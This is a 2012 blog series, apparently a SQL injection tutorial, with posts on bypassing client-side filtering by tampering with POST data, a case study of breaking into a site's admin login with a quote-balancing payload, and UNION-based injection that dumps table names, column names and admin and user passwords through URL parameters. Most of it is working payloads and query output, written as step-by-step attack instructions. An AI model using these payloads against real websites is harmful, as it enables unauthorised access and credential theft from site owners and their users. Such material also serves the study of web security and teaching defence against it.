Wednesday, July 18, 2012

Modifying POST Parameters

Hello, Friends, So till now, We have somewhat understanding of how and where to inject at the very basics. But Life is not so easy, as its a never ending war between developers and breakers.

Lets see another way to inject.

If you flashback to this blog, I have discussed about the 3-tier logic, and how a request is processed.

Lets say, I have a Login Form in front of me, now I start fuzzing, I try with garbage values, but surprisingly, I do get a same error as "Incorrect Credentials". Though this scenario, is not found in all the cases, but yes you would run into such situations sometimes.

What I do now is check the "View Page Source" (Ctrl+u) and look for the login form code, and If I find something like this:

<form method="POST">
//Code here
<input type="submit" value="Login" onClick = "someJavaScriptFunction(value1, value2)" />
</form>

Then You should understand that Whatever value is being inserted, its getting filtered by the Javascript Code, and hence our input values never reaches the second Layer like the PHP source or ASP etc...

This type of filtration is known as Client Side Filtration.

And the Flow is like this:

Login Form >> (Javascript) >> (PHP/ASP) >> SQL Database

Now If we can change our values when its between Javascript Filter and PHP/ASP, our Job is done.

For this we need a FireFox Addon (Tamper Data) install it.

How To work with it.. After installing Tamper Data, on the browser, click on:

Tools >> Tamper Data >> Start Tamper

Now on the login form, type any value:

Username: admin; Password:idontknow; and then click on Login

Once you do that, You would get option to tamper, click on Tamper, you would see the form data that you typed on the right handside of the Tamper-Data Window..

This is where, you need to change the values again, like using ' or " or \, the way discussed before and keep going until you get what you were looking for.

I know this is little pain, but hey thats how you deal with it.
   
Stay Tuned For more.

Sunday, July 8, 2012

Case Study 1


This is a case study, of a Site that was broken into. And Often I will Be Posting Case Studies To show different ways of fuzzing.

Here I sharing the Way the Admin Panel Was broken.

So, I had the Admin Login Page in front of me, the very first thing I can try is, insert a garbage value, to see the response. If we get an error directly from the database, its good, otherwise its again a different story.

The Username I entered as 'admin' and for password, I entered was '

Microsoft JET Database Engine error '80040e14'

Syntax error in string in query expression '(UID='admin' AND PWD=''');'


Awesome, We got an Error Here, lets try to understand the Error.

The moment I entered ' this broke the normal functionality, Which means insertion of ' made the Query unbalanced somewhere.


'(UID='admin' AND PWD=''');'

Remove the Outer '

(UID='admin' AND PWD=''');

Remove the ;

(UID='admin' AND PWD=''')

lets break it and try to understand.

'  (    UID  =  '  <user_input>  '    AND    PWD = '      <user_input>      '   )  ;'

When user-name: admin and password: '

'  (    UID  =  '  admin  '    AND    PWD = '     '     '   )  ;'

If password is: ')

(    UID  =  '  admin  '    AND    PWD = '      '  )      '   )  ;'

Left Side is kind of balanced, but we do still have an extra single quote.

If Password is: ')OR('1'

(    UID  =  '  admin  '    AND    PWD = '      '  )   OR   (    ' 1  '    )  ;'

Seems Like Balanced, Lets Check It Out.

So I am checking with, username: admin, password: ')OR('1'

Oops Got an error:

Syntax error in string in query expression '(UID='admin' AND PWD='')OR('1'');'.

[Purposely, I made the error, to show you how to understand from errors]

After analysing the error, I do see

PWD='   ')OR('1'   '

Unbalanced Quotes, My bad, We need to remove the last single quote from our query,

So again our username: admin, and password: ')OR('1

Woops it said Welcome Admin.

Thus it is just to show that, using some predefined SQL Query, for breaking panels, would be many a times useless, because fuzzing always depends on the way developers developed it.

Thats All For This post.

Saturday, July 7, 2012

Dumping The Database

Okay, now that we know what are the tables in the Database, we will try to dump the contents of the Table from the Database.

So as we know we have 3 tables, in the 'ckorner' database, viz 'admin', 'products', 'users'

And we also know that the columns of 'admin' are 'id', 'name' and 'pwd', lets now try dumping the records.

So our URL is

www.example.com/products.php?id = 1

Developers side is on the left hand side of '=' and right hand side is for us.

Lets try to frame the query in MySQL server.

The Normal Query:

mysql> select id, product, price from products where id=1;
+------+---------+-------+
| id   | product | price |
+------+---------+-------+
|    1 | printer |  2500 |
+------+---------+-------+
1 row in set (0.00 sec)

mysql>

Now our Fuzzing starts


mysql> select id, product, price from products where id= 1 union select 1,2,table_name from information_schema.tables where table_schema='ckorner';
+------+---------+----------+
| id   | product | price    |
+------+---------+----------+
|    1 | printer | 2500     |
|    1 | 2       | admin    |
|    1 | 2       | products |
|    1 | 2       | users    |
+------+---------+----------+
4 rows in set (0.00 sec)

mysql> select id, product, price from products where id= 1 union select 1,2,column_name from information_schema.columns where table_name='admin';
+------+---------+-------+
| id   | product | price |
+------+---------+-------+
|    1 | printer | 2500  |
|    1 | 2       | id    |
|    1 | 2       | name  |
|    1 | 2       | pwd   |
+------+---------+-------+
4 rows in set (0.00 sec)

mysql> select id, product, price from products where id= 1 union select 1,2,id from ckorner.admin;
+------+---------+-------+
| id   | product | price |
+------+---------+-------+
|    1 | printer |  2500 |
|    1 | 2       |     1 |
|    1 | 2       |     2 |
|    1 | 2       |     3 |
+------+---------+-------+
4 rows in set (0.00 sec)

mysql> select id, product, price from products where id = 1 union select 1,2,name from ckorner.admin;
+------+---------+---------+
| id   | product | price   |
+------+---------+---------+
|    1 | printer | 2500    |
|    1 | 2       | whiskey |
|    1 | 2       | Kumar   |
|    1 | 2       | Onty    |
+------+---------+---------+
4 rows in set (0.00 sec)

mysql> select id, product, price from products where id = 1 union select 1,2,pwd from ckorner.admin;
+------+---------+-------------+
| id   | product | price       |
+------+---------+-------------+
|    1 | printer | 2500        |
|    1 | 2       | whiskey@123 |
|    1 | 2       | kumar@123   |
|    1 | 2       | Onty@123    |
+------+---------+-------------+
4 rows in set (0.00 sec)

mysql> select id, product, price from products where id= 1 union select 1,2,concat(name, pwd) from ckorner.admin;
+------+---------+--------------------+
| id   | product | price              |
+------+---------+--------------------+
|    1 | printer | 2500               |
|    1 | 2       | whiskeywhiskey@123 |
|    1 | 2       | Kumarkumar@123     |
|    1 | 2       | OntyOnty@123       |
+------+---------+--------------------+
4 rows in set (0.00 sec)

mysql> select id, product, price from products where id= 1 union select 1,2,group_concat(name, pwd) from ckorner.admin;
+------+---------+------------------------------------------------+
| id   | product | price                                          |
+------+---------+------------------------------------------------+
|    1 | printer | 2500                                           |
|    1 | 2       | whiskeywhiskey@123,Kumarkumar@123,OntyOnty@123 |
+------+---------+------------------------------------------------+
2 rows in set (0.00 sec)

mysql> select id, product, price from products where id = 9 union select 1,2,group_concat(id, product, price) from ckorner.products;
+------+---------+-------------------------------------------------------+
| id   | product | price                                                 |
+------+---------+-------------------------------------------------------+
|    1 | 2       | 1printer2500,2Laptop15000,3Desktop25000,4pen-drive300 |
+------+---------+-------------------------------------------------------+
1 row in set (0.00 sec)

mysql> select id, product, price from products where id = 9 union select 1,2,group_concat(id, name, pwd) from ckorner.users;
+------+---------+---------------------------------------------------------+
| id   | product | price                                                   |
+------+---------+---------------------------------------------------------+
|    1 | 2       | 1Rishabhrishabh@123,2Web Rulerweb@123,3Mafiozimafia@123 |
+------+---------+---------------------------------------------------------+
1 row in set (0.00 sec)

mysql>


So, we see here, if we know the database name, table name and the columns in the table, we can dump the contents.

Now lets build the same in our URL:

www.example.com/products.php?id = 1 union select 1,2,group_concat(id, name, pwd) from ckorner.users --+

In case the above result doesnt dump the contents, like before we need to give an ID that does exist in the table, i prefer using negative values.

www.example.com/products.php?id = -1 union select 1,2,group_concat(id, name, pwd) from ckorner.users --+

And This would dump all the id, name and pwd records from the 'ckorner' database.

Hope this was informative, Stay Tuned For More.

Monday, July 2, 2012

Dumping The Columns Of A Table

Okay, so now that we know how to find the Table Names, lets try to find the columns in the Tables.

From our Last post we know that the Database has three tables:

admin, products, users

And Our URL:

www.example.com/index.php?id=1

Lets change the URL for better understanding, assume we are on the Products Page Of the Website, where certain product id displays information related the id.

So, www.example.com/products.php?id=1

So in the backend database its something like this,

mysql> select id, product, price from products where id=1;

+------+---------+-------+
| id   | product | price |
+------+---------+-------+
|    1 | printer |  2500 |
+------+---------+-------+
1 row in set (0.00 sec)

mysql>

We know the columns count used is three from the earlier posts.

Now we will see the magic, we are on the products table, but being in this table we will try dumping the data of the other tables in the database.

So Lets check the Simulation First from the MySQL Server.

We will split the query:

SELECT id, product, price FROM products WHERE id = <user input>;

So left hand side is the Developers Code, And Pentester has to work on the Right Hand Side.

We know, the below query will show the tables in the database,

mysql> select * from products where id=1 union select 1,2,table_name from information_schema.tables where table_schema='ckorner';
+------+---------+----------+
| id   | product | price    |
+------+---------+----------+
|    1 | printer | 2500     |
|    1 | 2       | admin    |
|    1 | 2       | products |
|    1 | 2       | users    |
+------+---------+----------+
4 rows in set (0.00 sec)

So lets say we are interested to look for the admin table, so what do we have to do now, we have to find the columns in the admin table.

Database 'information_schema' has a Table named 'column_name' that holds the column names for all the tables in a database. So we will use the 'information_schema' database once again to find the columns in the table 'admin' of database 'ckorner'

mysql> select * from products where id=1 union select 1,2,column_name from information_schema.columns where table_name='admin';
+------+---------+-------+
| id   | product | price |
+------+---------+-------+
|    1 | printer | 2500  |
|    1 | 2       | id    |
|    1 | 2       | name  |
|    1 | 2       | pwd   |
+------+---------+-------+
4 rows in set (0.00 sec)

mysql>

So we get the Columns of 'admin' in the 'ckorner' database. lets try for the other tables in 'ckorner' database.

mysql> select * from products where id=1 union select 1,2,column_name from information_schema.columns where table_name='products';
+------+---------+---------+
| id   | product | price   |
+------+---------+---------+
|    1 | printer | 2500    |
|    1 | 2       | id      |
|    1 | 2       | product |
|    1 | 2       | price   |
+------+---------+---------+
4 rows in set (0.00 sec)

mysql> select * from products where id=1 union select 1,2,column_name from information_schema.columns where table_name='users';
+------+---------+-------+
| id   | product | price |
+------+---------+-------+
|    1 | printer | 2500  |
|    1 | 2       | id    |
|    1 | 2       | name  |
|    1 | 2       | pwd   |
+------+---------+-------+
4 rows in set (0.00 sec)

mysql>

So we see that it easily dumps the column names of other tables (admin, users) inspite of being in a query that is supposed to show the contents 'products' table.

So now we will put our built queries in the URL:

www.example.com/products.php?id=1

www.example.com/products.php?id=1 union select 1,2,column_name from information_schema.columns where table_name='admin'

It dint dump, reason? remember I said, its URL and the parameters has to be hex encoded, you can encode the passing parameter 'admin' from online tools, or you can use our tool to hex encode the paramters.

Download Link: Click Here

hex encode of 'admin' is: 0x61646d696e

Are we still missing out something? remember the comment symbol?

we have to comment out the rest of the queries being passed, so that before the query reaches the database, the remaining queries gets ignored.

www.example.com/products.php?id=1 union select 1,2,column_name from information_schema.columns where table_name=0x61646d696e --+

In Some Cases If It Doesnt Work, You need To change The Id Value With An Id that doesnt exist in the Table like 9999 or -1, using -1 is a sure shot value to dump as there would be no records with -1 value

www.example.com/products.php?id = -1 union select 1,2,column_name from information_schema.columns where table_name=0x61646d696e --+

And this this out display the column names of Table 'admin'.

Thats all for this post, hope this was informative.

Thank You!